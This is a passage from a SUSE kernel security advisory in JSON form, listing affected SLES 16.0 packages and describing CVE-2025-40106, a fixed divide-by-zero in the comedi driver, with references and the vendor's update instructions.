"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-40097"
},
{
"cve": "CVE-2025-40106",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40106"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: fix divide-by-zero in comedi_buf_munge()\n\nThe comedi_buf_munge() function performs a modulo operation\n`async-\u003emunge_chan %= async-\u003ecmd.chanlist_len` without first\nchecking if chanlist_len is zero. If a user program submits a command with\nchanlist_len set to zero, this causes a divide-by-zero error when the device\nprocesses data in the interrupt handler path.\n\nAdd a check for zero chanlist_len at the beginning of the\nfunction, similar to the existing checks for !map and\nCMDF_RAWDATA flag. When chanlist_len is zero, update\nmunge_count and return early, indicating the data was\nhandled without munging.\n\nThis prevents potential kernel panics from malformed user commands.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40106",
"url": "https://www.suse.com/security/cve/CVE-2025-40106"
},
{
"category": "external",
"summary": "SUSE Bug 1252891 for CVE-2025-40106",
"url": "https://bugzilla.suse.com/1252891"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
